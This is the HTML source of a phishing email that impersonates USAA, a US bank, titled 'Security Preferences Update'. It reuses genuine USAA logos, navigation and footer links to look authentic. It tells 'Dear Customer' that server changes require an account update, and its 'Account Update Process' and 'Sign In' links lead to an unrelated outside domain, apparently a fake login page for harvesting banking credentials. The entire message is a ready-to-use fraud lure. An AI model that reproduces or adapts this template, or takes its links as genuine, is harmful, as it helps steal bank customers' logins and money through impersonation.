<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>To ensure delivery to your inbox</title>
<style>
<!--
body { background-color: #fff; }body { color: #000; background-color: #fff;padding: 0px; margin: 8px 0px 0px 12px; } p { margin : 0 }-->
</style>
</head>

<body>

<div dir="ltr">
&nbsp;</div>
<wbr />
<div id="yiv1133833263">
  <title>To ensure delivery to your inbox</title>
  <div id="yui_3_2_0_60_1338927367072178">
    <span style="font-style: normal; font-variant: normal; font-weight: normal; font-size: 16px; font-family: Times New Roman; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-spacing: normal; word-spacing: 0px; white-space: normal; border-collapse: separate; orphans: 2; widows: 2" class="yiv1133833263Apple-style-span ms__id65202">
    <span style="line-height: 15px; font-family: arial, helvetica, clean, sans-serif; font-size: 13px" class="yiv1133833263Apple-style-span ms__id65203">
    <table style="line-height: 1.2em; font-size: inherit; display: table; border-collapse: collapse; outline-style: none" border="0" cellSpacing="0" cellPadding="0" width="650" bgColor="#b5d7e6">
      <tbody style="line-height: 1.2em; outline-style: none">
        <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="35" vAlign="middle" background="https://content.usaa.com/mcontent/static_assets/Media/email_emailbar_bg.gif" width="650" align="center">
          <font style="color: rgb(146, 146, 146); line-height: 1.2em; font-size: 9px; outline-style: none" face="Verdana, sans-serif">
          To ensure delivery to your inbox, please add<span class="yiv1133833263Apple-converted-space">
          </span>
          <span style="color: rgb(104, 167, 197); line-height: 1.2em; outline-style: none">
          <span style="line-height: 1.2em; outline-style: none" id="yiv1133833263lw_1297908994_0" class="yiv1133833263yshortcuts">
          USAA.Web.Services@customermail.usaa.com</span></span><span class="yiv1133833263Apple-converted-space">
          </span>to your address book.</font></td>
          <td style="line-height: 1.2em; display: table-cell; outline-style: none">&nbsp;</td>
        </tr>
    </table>
    <table style="line-height: 1.2em; font-size: inherit; display: table; border-collapse: collapse; outline-style: none" border="0" cellSpacing="0" cellPadding="0" width="650" bgColor="#b5d7e6">
      <tbody style="line-height: 1.2em; outline-style: none">
        <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" width="10">&nbsp;</td>
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" bgColor="white" width="630" align="center">
          <table style="line-height: 1.2em; font-size: inherit; display: table; border-collapse: collapse; outline-style: none" border="0" cellSpacing="0" cellPadding="0" width="604">
            <tbody style="line-height: 1.2em; outline-style: none">
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="5" colSpan="4">
                </td>
              </tr>
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="45" width="54">
                <a style="color: rgb(0, 51, 153); line-height: 1.2em; text-decoration: underline; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_logon/Logon?EID=66659-0309_head" rel="nofollow" target="_blank">
                <img style="line-height: 1.2em; outline-style: none; cursor: pointer; border: medium none" border="0" alt src="https://content.usaa.com/mcontent/static_assets/Media/email_logo.gif" width="61" height="41"></a></td>
                <td style="line-height: 1.2em; display: table-cell; outline-style: none">
                <table style="line-height: 1.2em; font-size: inherit; display: table; border-collapse: collapse; outline-style: none" border="0" cellSpacing="0" cellPadding="0">
                  <tbody style="line-height: 1.2em; outline-style: none">
                    <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                      <td style="font-style: normal; font-variant: normal; font-weight: bold; line-height: 1.2em; font-size: 16px; font-family: Arial, sans-serif; color: rgb(109, 109, 109); display: table-cell; outline-style: none" class="ms__id65229" height="22" align="left">
                      <span style="font-style: normal; font-variant: normal; font-weight: normal; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-spacing: normal; word-spacing: 0px; white-space: normal; border-collapse: separate; orphans: 2; widows: 2" class="yiv1133833263Apple-style-span ms__id65230">
                      <span style="color: rgb(109, 109, 109); line-height: 19px; font-family: Arial, sans-serif; font-size: 16px; font-weight: bold; border-collapse: collapse" class="yiv1133833263Apple-style-span ms__id65231">
                      Security Preferences Update</span></span></td>
                    </tr>
                    <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                      <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="23" noWrap align="left">
                      <font style="line-height: 1.2em; outline-style: none" size="1" face="Verdana, sans-serif">
                      <a style="color: rgb(109, 109, 109); line-height: 1.2em; text-decoration: none; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_home/CpHome?EID=66659-0309_head" rel="nofollow" target="_blank">
                      View Accounts</a><span class="yiv1133833263Apple-converted-space">
                      </span>|<span class="yiv1133833263Apple-converted-space">
                      </span>
                      <a style="color: rgb(109, 109, 109); line-height: 1.2em; text-decoration: none; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_utils/McStaticPages?key=privacy_promise&EID=66659-0309_head" rel="nofollow" target="_blank">
                      Privacy Promise</a><span class="yiv1133833263Apple-converted-space">
                      </span>|<span class="yiv1133833263Apple-converted-space">
                      </span>
                      <a style="color: rgb(109, 109, 109); line-height: 1.2em; text-decoration: none; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_references/CpLevelZeroContactUs?ContactUsPageId=PublicContactUs&EID=66659-0309_head" rel="nofollow" target="_blank">
                      Contact Us</a></font></td>
                    </tr>
                </table>
                </td>
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="45" vAlign="middle" width="367" align="right">
                <a style="color: rgb(182, 182, 182); line-height: 1.2em; text-decoration: underline; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_utils/McStaticPages?key=security_guarantee&EID=66659-0309_head" rel="nofollow" target="_blank">
                <font style="line-height: 1.2em; outline-style: none" size="1" face="Verdana, sans-serif">
                Online Security Guarantee</font></a> </td>
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="45" width="16">
                <img style="line-height: 1.2em; outline-style: none; cursor: pointer; border: medium none" border="0" alt src="https://content.usaa.com/mcontent/static_assets/Media/email_lock.gif?EID=66659-0309_open" width="18" height="24"></td>
              </tr>
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="20" colSpan="4">&nbsp;</td>
              </tr>
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="1" colSpan="4">
                </td>
              </tr>
          </table>
          <table style="line-height: 1.2em; font-size: inherit; display: table; border-collapse: collapse; outline-style: none" border="0" cellSpacing="0" cellPadding="0" width="95%">
            <tbody style="line-height: 1.2em; outline-style: none">
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="20" colSpan="2">
                <span style="line-height: 15px; font-size: 13px" class="yiv1133833263Apple-style-span">
                <span style="color: rgb(0, 0, 0); text-transform: none; line-height: normal; text-indent: 0px; letter-spacing: normal; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: normal; word-spacing: 0px; white-space: normal; border-collapse: separate; orphans: 2; widows: 2" class="yiv1133833263Apple-style-span">
                <font face="Verdana">Dear Customer</font></span></span></td>
              </tr>
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" width="95%" align="left">&nbsp;<p>
                <font style="color: rgb(51, 51, 51); line-height: 18px; font-size: 9pt; outline-style: none" face="Verdana, sans-serif">
                <font id="yui_3_2_0_60_1338927367072159" face="Verdana">Due to 
                the changes made on our website and our servers, we have decided 
                to make an </font></font><font face="Verdana">
                <font style="line-height: 18px; font-size: 9pt; outline-style: none" face="Verdana, sans-serif">
                U</font><font style="color: rgb(51, 51, 51); line-height: 18px; font-size: 9pt; outline-style: none" id="yui_3_2_0_60_1338927367072161" face="Verdana, sans-serif"><font style="line-height: 18px; font-size: 9pt; outline-style: none" face="Verdana, sans-serif">pdate</font> 
                page for your account (s) for security reasons, and to prevent 
                you and your account (s) from fraudulent activities. </font>
                </font></p>
                <p align="center"><font face="Verdana">
                <font style="color: rgb(51, 51, 51); line-height: 18px; font-size: 9pt; outline-style: none" id="yui_3_2_0_60_1338927367072161" face="Verdana, sans-serif">
                <b>
                <a href="http://pitichines.com/nuevaweb/usaa.com/" rel="nofollow" target="_blank" style="color: blue !important; text-decoration: underline !important; cursor: text !important">
                Account Update Process</a></b></font></font><font style="color: rgb(51, 51, 51); line-height: 18px; font-size: 9pt; outline-style: none" face="Verdana, sans-serif"></p>
                <p id="yui_3_2_0_60_1338927367072164">As part of our ongoing 
                commitment to provide the &quot;Best Possible&quot; service and protection 
                to all our customers, we are requiring each Customer to Update 
                their account (s) using the new SSL servers. Please Update your 
                online banking account (s) by clicking on </p>
                <p id="yui_3_2_0_60_1338927367072164">
                <a href="http://pitichines.com/nuevaweb/usaa.com/" rel="nofollow" target="_blank" style="color: blue !important; text-decoration: underline !important; cursor: text !important; font-weight: 700">
                Sign In</a> and then do as required.</p>
                </font>
                <p>.<font style="color: rgb(51, 51, 51); line-height: 18px; font-size: 12px; outline-style: none" id="yui_3_2_0_60_1338927367072167" face="Verdana, sans-serif"><br style="line-height: 1.2em; outline-style: none">
                USAA</font></td>
                <td style="line-height: 1.2em; display: table-cell; outline-style: none">&nbsp;</td>
              </tr>
              <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
                <td style="line-height: 1.2em; display: table-cell; outline-style: none" height="30" colSpan="2">&nbsp;</td>
              </tr>
          </table>
          </td>
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" background="https://content.usaa.com/mcontent/static_assets/Media/email_vertical-ds.gif" width="5">&nbsp;</td>
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" width="5">&nbsp;</td>
        </tr>
        <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" colSpan="4" align="center">
          <font style="color: rgb(109, 109, 109); line-height: 18px; font-size: 10px; outline-style: none" id="yui_3_2_0_60_1338927367072168" face="Verdana, sans-serif">
          Please do not reply to this e-mail. To send a secure message to USAA, 
          please<span class="yiv1133833263Apple-converted-space"> </span>
          <a style="color: rgb(64, 140, 176); line-height: 1.2em; text-decoration: none; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_references/CpSendUsAMessage?ContentArea=cp&EID=66659-0309_foot" rel="nofollow" target="_blank">
          contact us</a>.<br style="line-height: 1.2em; outline-style: none">
          <br style="line-height: 1.2em; outline-style: none">
          <a style="color: rgb(109, 109, 109); line-height: 1.2em; text-decoration: underline; outline-style: none; cursor: text" href="https://www.usaa.com/inet/ent_utils/McStaticPages?key=privacy_promise&EID=66659-0309_foot" rel="nofollow" target="_blank">
          Privacy Promise</a><br style="line-height: 1.2em; outline-style: none">
          USAA,<span class="yiv1133833263Apple-converted-space"> </span>
          <span style="line-height: 1.2em; outline-style: none" id="yiv1133833263lw_1297908994_4" class="yiv1133833263yshortcuts">
          9800 Fredericksburg Road San Antonio, TX 78288-9876</span><br style="line-height: 1.2em; outline-style: none">
&nbsp;</font></td>
        </tr>
        <tr style="line-height: 1.2em; vertical-align: inherit; display: table-row; outline-style: none">
          <td style="line-height: 1.2em; display: table-cell; outline-style: none" id="yui_3_2_0_60_1338927367072169" colSpan="4" align="right">
          <font style="color: rgb(109, 109, 109); line-height: 18px; font-size: 10px; outline-style: none" face="Verdana, sans-serif">
          66659-0309 </font><br style="line-height: 1.2em; outline-style: none">
&nbsp;</td>
        </tr>
    </table>
    </span></span>
  </div>
</div>

</body>

</html>